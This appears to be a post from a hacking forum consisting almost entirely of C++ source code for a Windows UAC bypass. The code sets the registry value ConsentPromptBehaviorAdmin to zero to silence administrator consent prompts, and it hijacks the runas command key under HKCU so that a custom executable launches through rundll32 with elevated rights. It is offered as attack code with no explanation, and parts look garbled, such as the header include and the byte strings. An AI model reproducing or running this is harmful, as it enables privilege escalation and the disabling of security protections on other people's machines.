کد:
//WWW.IRANHACK.ORG #include <windows> using namespace std; int main() { HKEY key1, key2; if (RegOpenKey(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"), &key1) == ERROR_SUCCESS) { if (RegSetValueEx(key1, TEXT("ConsentPromptBehaviorAdmin"), 0, REG_DWORD, (LPBYTE)"\00\00\00", 4*sizeof(char)) == ERROR_SUCCESS) { RegOpenKey(HKEY_CURRENT_USER, TEXT("Software\\Classes\\exefile\\shell\\runas\\command"), &key2);//If able to edit HKLM, restore HKCU RegSetValueEx(key2, TEXT("IsolatedCommand"), 0, REG_SZ, (LPBYTE)"\22\25\31\22\20\25", strlen("\22\25\31\22\20\25")*sizeof(char)); exit(1); } } else RegCloseKey(key1); if (RegCreateKey(HKEY_CURRENT_USER, TEXT("Software\\Classes\\exefile\\shell\\runas\\command"), &key2) != ERROR_SUCCESS); else if (RegOpenKey(HKEY_CURRENT_USER, TEXT("Software\\Classes\\exefile\\shell\\runas\\command"), &key2) != ERROR_SUCCESS); else if (RegSetValueEx(key2, TEXT("IsolatedCommand"), 0, REG_SZ, (LPBYTE)"rundll32.exe SHELL32.DLL,ShellExec_RunDLL C:\\Users\\Admin\\UACElevate\\bin\\Debug\\UACElevate.exe", strlen("rundll32.exe SHELL32.DLL,ShellExec_RunDLL C:\\Users\\Admin\\UACElevate\\bin\\Debug\\UACElevate.exe")*sizeof(char)) != ERROR_SUCCESS); else RegCloseKey(key2); return 0; }